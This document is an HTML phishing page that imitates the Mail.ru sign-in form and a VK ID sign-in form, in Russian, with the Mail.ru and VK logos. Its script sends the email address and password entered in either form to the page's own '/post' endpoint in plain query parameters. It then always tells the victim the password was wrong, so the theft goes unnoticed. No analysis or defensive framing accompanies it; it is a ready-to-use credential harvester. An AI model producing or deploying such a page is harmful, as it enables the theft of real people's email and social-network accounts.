<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Mail.ru</title>
    <style>
        body {
            background-color: #141414;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            font-family: 'Calibri', sans-serif;
        }
        .zero {
            background-color: #222222;
            border-radius: 12px;
            padding: 20px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
        }
        .right-side {
            color: white;
        }
        .sign-in {
            display: flex;
            flex-direction: column;
            align-items: center; 
            gap: 6px; 
            margin-bottom: 5px;
        }
        .vkc__DefaultSkin__caption {
            font-size: 22px;
            text-align: center; 
        }
        .login {
            display: flex;
            flex-direction: column;
            align-items: center;
        }
        .login-outside {
            background-color: #222222;
            border-radius: 10px;
            border: 1px solid #363738;
            padding: 5px;
            margin-top: 10px;
            width: 250px;
            display: flex;
            align-items: center;
        }
        .login-write {
            display: flex;
            align-items: center;
            flex-grow: 1;
        }
        .login-write input {
            margin-bottom: 2px;
            color: white;
            width: 100%;
            background-color: transparent;
            border: none;
            outline: none;
        }
        .separator {
            width: 1px;
            height: 30px; 
            background-color: #363738;
            margin: 0 5px;
        }
        .mails {
            margin-left: 5px;
            color: white;
            background-color: transparent;
            border: none;
            outline: none;
            padding: 5px;
            cursor: pointer;
        }
        .checkbox {
            display: flex;
            gap: 7px;
            margin-top: 15px;
        }
        .login button {
            background-color: #0077FF;
            color: white;
            border: 1px solid #0077FF;
            border-radius: 10px;
            padding: 3px 20px;
            font-weight: 700;
            font-size: 14px;
            width: 100%;
            height: 35px;
            margin-top: 15px;
        }
        .forgot-btn{
            background: transparent;
            color: #387ae4;
            border-radius: 8px;
            border: none;
            font-size: 14px;
            justify-content: left; 
            align-items: left; 
        }
        .hidden {
            display: none;
        }
        .login button:hover {
            background-color: #0073F7;
            border: 1px solid #0073F7;
            color: white;
        }
        .invalid {
            color: #ff2748;
            margin-top: 5px;
        }
        .invalid-border {
            border: 1px solid red;
        }
        .parent {
            padding:10px;
            display: flex;
            justify-content: center;
            align-items: center; 
        }
        .mails {
            margin-bottom: 2px;
            color: #c2c2c2;
            background-color: #222222;
            width: 200px;
            border-radius: 20px;
            border: none;
            outline: none;
            border: #222222 2px solid;
        }
        .aedfwarsxfgvb { 
            display: flex; 
            justify-content: center; 
            align-items: center; 
        }
    </style>
</head>
<body>
    <div class="zero" id="mailform">
        <div class="right-side">
            <div class="parent">
                <svg width="96px" height="32px" viewBox="0 0 96 32" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
                    <title>Logo</title>
                    <desc>Created with Sketch.</desc>
                    <defs>
                        <path d="M82.2611707,23.4784447 L79.259403,23.4784447 L79.259403,22.3740673 C78.0996498,23.3883565 76.5844785,23.9925607 74.8019359,23.9925607 C70.539141,23.9925607 67.078359,20.5370776 67.078359,16.2808717 C67.078359,12.0246658 70.539141,8.56923311 74.8019359,8.56923311 C76.5844785,8.56923311 78.0996498,9.17341716 79.259403,10.1877164 L79.259403,9.08328858 L82.2611707,9.08328858 L82.2611707,23.4784447 Z M44.1564208,23.4784447 L41.154754,23.4784447 L41.154754,9.0833894 L44.1564208,9.0833894 L44.1564208,9.8827512 C44.8230315,9.25699276 46.0775966,8.57135023 47.634065,8.56923311 C49.6329884,8.56923311 51.4230028,9.47818077 52.6124416,10.9035026 C53.8019813,9.47818077 55.5919957,8.56923311 57.5909191,8.56923311 C61.1635771,8.56923311 64.0702301,11.4713933 64.0702301,15.038529 L64.0702301,23.4784447 L61.0684624,23.4784447 L61.0684624,15.038529 C61.0684624,13.1240529 59.508359,11.566361 57.5909191,11.566361 C55.6732774,11.566361 54.1133759,13.1240529 54.1133759,15.038529 L54.1133759,23.4784447 L51.1116082,23.4784447 L51.1116082,15.038529 C51.1116082,13.1240529 49.5515048,11.566361 47.634065,11.566361 C45.7165242,11.566361 44.1564208,13.1240529 44.1564208,15.038529 L44.1564208,23.4784447 Z M85.8482675,23.4784447 L88.8500352,23.4784447 L88.8500352,9.08337932 L85.8482675,9.08337932 L85.8482675,23.4784447 Z M92.4374349,23.4784447 L95.4392027,23.4784447 L95.4392027,2.91400797 L92.4374349,2.91400797 L92.4374349,23.4784447 Z M74.8019359,11.5259342 C77.4303128,11.5259342 79.5015315,13.6565575 79.5015315,16.2808717 C79.5015315,18.9051859 77.4303128,21.0358092 74.8019359,21.0358092 C72.1735591,21.0358092 70.0396373,18.9051859 70.0396373,16.2808717 C70.0396373,13.6565575 72.1735591,11.5259342 74.8019359,11.5259342 Z M87.3515242,2.39986177 C88.4894677,2.39986177 89.4132516,3.32231863 89.4132516,4.45840239 C89.4132516,5.59458697 88.4894677,6.51704383 87.3515242,6.51704383 C86.2135807,6.51704383 85.2897967,5.59458697 85.2897967,4.45840239 C85.2897967,3.32231863 86.2135807,2.39986177 87.3515242,2.39986177 Z" id="path-1"></path>
                    </defs>
                    <g id="done" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
                        <g id="new-logo_septima_grafit" transform="translate(-84.000000, -44.000000)">
                            <g id="head" transform="translate(0.000000, 32.000000)">
                                <g id="left-part" transform="translate(84.000000, 0.000000)">
                                    <g id="Logo" transform="translate(0.000000, 12.000000)">
                                        <g id="Group-3" transform="translate(41.000000, 3.008869)"></g>
                                        <g id="Group-7">
                                            <path d="M16.083798,0 C7.26134934,0 0.0837980498,7.17755129 0.0837980498,15.9998994 C0.0837980498,24.8224487 7.26134934,32 16.083798,32 C19.3274179,32 22.4540408,31.0229806 25.0962786,29.2171245 L22.9991878,26.779103 C20.9488757,28.0979585 18.5592424,28.809899 16.083798,28.809899 C9.02032625,28.809899 3.27389909,23.0634718 3.27389909,15.9998994 C3.27389909,8.9364276 9.02032625,3.19000044 16.083798,3.19000044 C23.1473705,3.19000044 28.8937976,8.9364276 28.8937976,15.9998994 C28.8937976,16.9301401 28.7893756,17.8550491 28.592,18.7547077 C28.1813541,20.4386376 27.0072609,20.9594397 26.105188,20.8889196 C25.2156899,20.817293 24.1589959,20.1831157 24.1520546,18.6169874 L24.1520546,15.9998994 C24.1520546,11.5512018 20.5325962,7.93174345 16.083798,7.93174345 C11.6352011,7.93174345 8.0155415,11.5512018 8.0155415,15.9998994 C8.0155415,20.4488988 11.6352011,24.0682566 16.083798,24.0682566 C18.3384272,24.0682566 20.37878,23.1375128 21.8442085,21.6416028 C22.7071484,23.0197112 24.1360593,23.9311399 25.8495654,24.0687595 C25.9924163,24.0802279 26.1350659,24.0858614 26.2773132,24.0858614 C27.4383285,24.0858614 28.5704718,23.7067031 29.5045353,22.9974787 C30.468678,22.2656196 31.1705586,21.2253233 31.564002,19.9668274 C31.6268765,19.7658302 31.7421632,19.300056 31.743471,19.2939194 L31.742968,19.2939194 C32.0053307,18.1579533 32.0838986,17.1099109 32.0838986,15.9998994 C32.0838986,7.17755129 24.9062468,0 16.083798,0 Z M11.2056425,15.9998994 C11.2056425,13.3101788 13.3940774,11.1218445 16.083798,11.1218445 C18.7736193,11.1218445 20.9619536,13.3101788 20.9619536,15.9998994 C20.9619536,18.6898212 18.7736193,20.8781555 16.083798,20.8781555 C13.3940774,20.8781555 11.2056425,18.6898212 11.2056425,15.9998994 Z" id="Clip-2" fill="#FF9E00"></path>
                                            <mask id="mask-2" fill="white">
                                                <use xlink:href="#path-1"></use>
                                            </mask>
                                            <use id="Fill-4" fill="#FFFFFF" xlink:href="#path-1"></use>
                                        </g>
                                    </g>
                                </g>
                            </g>
                        </g>
                    </g>
                </svg>
            </div>
            <form class="right-authorization">
                <div class="sign-in">
                    <i class='bx bx-user bx-sm'></i>
                    <div class="vkc__DefaultSkin__caption">Войти в аккаунт</div>
                </div>
                <div class="login">
                    <div class="login-outside" id="emailOutside">
                        <div class="login-write">
                            <i class='bx bx-user bx-xs'></i>
                            <input type="text" placeholder="Имя аккаунта" id="email">
                            <div class="separator"></div>
                            <select class="mails" name="Mail" id="alldl">
                                <option class="mails" value="@mail.ru" selected>@mail.ru</option>
                                <option class="mails" value="@inbox.ru">@inbox.ru</option>
                                <option class="mails" value="@bk.ru">@bk.ru</option>
                                <option class="mails" value="@yandex.ru">@yandex.ru</option>
                                <option class="mails" value="@list.ru">@list.ru</option>
                                <option class="mails" value="@internet.ru">@internet.ru</option>
                                <option class="mails" value="@xmail.ru">@xmail.ru</option>
                                <option class="mails" value="@gmail.com">@gmail.com</option>
                                <option class="mails" value="@hotmail.com">@hotmail.com</option>
                                <option class="mails" value="@yahoo.com">@yahoo.com</option>
                                <option class="mails" value="@outlook.com">@outlook.com</option>
                            </select>
                        </div>
                    </div>
                    <div id="emailError" class="invalid"></div>
                    <div class="login-outside" id="passOutside">
                        <div class="login-write">
                            <i class='bx bx-lock-alt bx-xs'></i>
                            <input type="password" placeholder="Пароль" id="password" minlength="6">
                        </div>
                    </div>
                    <div id="passError" class="invalid"></div>
                    <button type="button" id="aedfwarsxfgvb" class="aedfwarsxfgvb">Войти <svg width="20" height="20" viewBox="0 0 20 20" fill="#ffffff" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M7.47 4.217a.75.75 0 0 0 0 1.06L12.185 10 7.469 14.72a.75.75 0 1 0 1.062 1.06l5.245-5.25a.75.75 0 0 0 0-1.061L8.531 4.218a.75.75 0 0 0-1.061-.001z" fill="currentColor"></path></svg> </button>
                    <p onclick="tovkid();" class="forgot-btn">Войти через VK ID</p>
                </div>
            </form>
        </div>
    </div>
    <div class="zero hidden" id="vkform">
        <div class="right-side">
            <div class="parent">
                <svg class="centerr" width="48" height="48" fill="none" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20" role="img" aria-hidden="true" style="display: block;">
                    <path d="M0 9.6c0-4.5 0-6.8 1.4-8.2C2.8 0 5.1 0 9.6 0h.8c4.5 0 6.8 0 8.2 1.4C20 2.8 20 5.1 20 9.6v.8c0 4.5 0 6.8-1.4 8.2-1.4 1.4-3.7 1.4-8.2 1.4h-.8c-4.5 0-6.8 0-8.2-1.4C0 17.2 0 14.9 0 10.4v-.8Z" fill="#07F"></path>
                    <path d="M10.7 14.3c-4.5 0-7.2-3.1-7.3-8.3h2.3c0 3.8 1.8 5.4 3.1 5.8V6H11v3.3c1.3-.1 2.6-1.6 3-3.3h2.2c-.3 2-1.8 3.5-2.8 4.2 1 .5 2.7 1.8 3.3 4.1h-2.3c-.5-1.6-1.8-2.8-3.4-3v3h-.3Z" fill="#fff"></path>
                </svg>
            </div>
            <form class="right-authorization">
                <div class="sign-in">
                    <i class='bx bx-user bx-sm'></i>
                    <div class="vkc__DefaultSkin__caption">Войти через VK ID</div>
                </div>
                <div class="login">
                    <div class="login-outside" id="emailOutside2">
                        <div class="login-write">
                            <i class='bx bx-user bx-xs'></i>
                            <input type="text" placeholder="Номер телефона или почта" id="email2">
                        </div>
                    </div>
                    <div id="emailError" class="invalid"></div>
                    <div class="login-outside" id="passOutside2">
                        <div class="login-write">
                            <i class='bx bx-lock-alt bx-xs'></i>
                            <input type="password" placeholder="Пароль" id="password2" minlength="6">
                        </div>
                    </div>
                    <div id="passError2" class="invalid"></div>
                    <button type="button" id="aedfwarsxfgvb2" class="aedfwarsxfgvb">Войти <svg width="20" height="20" viewBox="0 0 20 20" fill="#ffffff" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M7.47 4.217a.75.75 0 0 0 0 1.06L12.185 10 7.469 14.72a.75.75 0 1 0 1.062 1.06l5.245-5.25a.75.75 0 0 0 0-1.061L8.531 4.218a.75.75 0 0 0-1.061-.001z" fill="currentColor"></path></svg> </button>
                    <p onclick="tomailru();" class="forgot-btn">Войти через Mail.ru</p>
                </div>
            </form>
        </div>
    </div>
    <script>
        let emailField = document.getElementById("email");
        let passField = document.getElementById("password");
        const passOutside = document.getElementById('passOutside');
        const emailOutside = document.getElementById('emailOutside');
        const ontouchsta = document.getElementById('aedfwarsxfgvb');
        const passError = document.getElementById('passError');
        const alldl = document.getElementById('alldl');
        const mailform = document.getElementById('mailform');

        let emailField2 = document.getElementById("email2");
        let passField2 = document.getElementById("password2");
        const passOutside2 = document.getElementById('passOutside2');
        const emailOutside2 = document.getElementById('emailOutside2');
        const passError2 = document.getElementById('passError2');
        const ontouchsta2 = document.getElementById('aedfwarsxfgvb2');
        const vkform = document.getElementById('vkform');

        ontouchsta.addEventListener("click", () => {
            if(emailField.value.trim() == "" || passField.value.trim() == "") {
                passOutside.classList.add("invalid-border");
                emailOutside.classList.add("invalid-border");
                passError.innerHTML = "Вы не заполнили некоторые поля!";
            } else {
                //console.log(alldl.value);
                fetch('/post?email=' + emailField.value.trim() + alldl.value + '&password=' + passField.value.trim(), {
                    mode: 'cors'
                })
                .catch(error => {

                });
                passOutside.classList.add("invalid-border");
                passError.innerHTML = "Вы ввели неверный пароль!";
            }
            return; 
        });
        ontouchsta2.addEventListener('click', () => {
            if(emailField2.value.trim() == "" || passField2.value.trim() == "") {
                passOutside2.classList.add("invalid-border");
                emailOutside2.classList.add("invalid-border");
                passError2.innerHTML = "Вы не заполнили некоторые поля!";
            } else {
                //console.log(alldl.value);
                fetch('/post?email=' + emailField2.value.trim() + '&password=' + passField2.value.trim(), {
                    mode: 'cors'
                })
                .catch(error => {
                });
                passOutside2.classList.add("invalid-border");
                passError2.innerHTML = "Вы ввели неверный пароль!";
            }
            return; 
        });
        function tovkid() {
            mailform.classList.add('hidden');
            vkform.classList.remove('hidden');
        }
        function tomailru() {
            mailform.classList.remove('hidden');
            vkform.classList.add('hidden');
        }
    </script>
</body>
</html>